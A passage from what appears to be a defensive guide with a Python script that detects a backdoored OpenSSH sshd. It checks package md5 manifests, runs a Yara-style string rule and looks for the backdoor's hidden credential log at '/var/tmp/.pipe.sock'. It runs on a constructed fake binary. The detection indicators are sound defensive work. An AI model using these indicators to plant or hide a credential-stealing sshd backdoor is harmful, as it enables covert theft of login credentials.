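BACKDOOR_LOG = "var/tmp/.pipe.sock"                        # encrypted credential log named in the report


def md5_of(path):
    with open(path, "rb") as f:
        return hashlib.md5(f.read()).hexdigest()


def parse_md5sums(text):
    """Parse dpkg's /var/lib/dpkg/info/<pkg>.md5sums format: '<md5>  <path relative to />'."""
    table = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2:
            table[parts[1].strip()] = parts[0].lower()
    return table


def verify_manifest(root, manifest_text):
    """Return {relative_path: 'ok' | 'modified' | 'missing'} for every file in the manifest."""
    results = {}
    for rel, expected in parse_md5sums(manifest_text).items():
        full = os.path.join(root, rel)
        if not os.path.isfile(full):
            results[rel] = "missing"
        else:
            results[rel] = "ok" if md5_of(full) == expected else "modified"
    return results


def matches_backdoored_ssh_rule(path):
    """Same conditions as the report's Yara rule: ELF magic, size < 1 MB, all three strings."""
    if os.path.getsize(path) >= YARA_MAX_SIZE:
        return False
    with open(path, "rb") as f:
        data = f.read()
    return data[:4] == ELF_MAGIC and all(s in data for s in YARA_STRINGS)


def assess_sshd(root, manifest_text, sshd_rel="usr/sbin/sshd"):
    """Combine the three indicators into one verdict dict."""
    sshd_path = os.path.join(root, sshd_rel)
    return {
        "manifest": verify_manifest(root, manifest_text).get(sshd_rel, "not in manifest"),
        "yara_rule": os.path.isfile(sshd_path) and matches_backdoored_ssh_rule(sshd_path),
        "backdoor_log_present": os.path.exists(os.path.join(root, BACKDOOR_LOG)),
    }


def run_demo():
    """Build a constructed root with a 'clean' sshd, then backdoor it and re-assess."""
    root = tempfile.mkdtemp(prefix="sshd-check-")
    try:
        sshd = os.path.join(root, "usr", "sbin", "sshd")
        os.makedirs(os.path.dirname(sshd))
        clean = ELF_MAGIC + b"\x00" * 60 + b"OpenSSH_7.4\x00"      # fake ELF, constructed
        with open(sshd, "wb") as f:
            f.write(clean)
        manifest = "%s  usr/sbin/sshd\n" % hashlib.md5(clean).hexdigest()
        before = assess_sshd(root, manifest)
        # Replace the binary with one carrying the strings the rule looks for, add the log file.
        with open(sshd, "wb") as f:
            f.write(clean + b"\x00usage: ssh\x00HISTFILE\x00")
        os.makedirs(os.path.join(root, "var", "tmp"))
        open(os.path.join(root, BACKDOOR_LOG), "wb").close()
        after = assess_sshd(root, manifest)
        return before, after
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    before, after = run_demo()
    print("clean:     ", before)
    print("backdoored:", after)
```

On a live Debian host the manifest text is `/var/lib/dpkg/info/openssh-server.md5sums` and `root` is `/`; on CentOS, `rpm -V openssh-server` performs the same comparison. A mismatch only proves the binary differs from the package; the Yara-style string check and the presence of the log file are what tie it to this particular backdoor family, and a legitimately rebuilt sshd will also fail the manifest check, so treat the three results together.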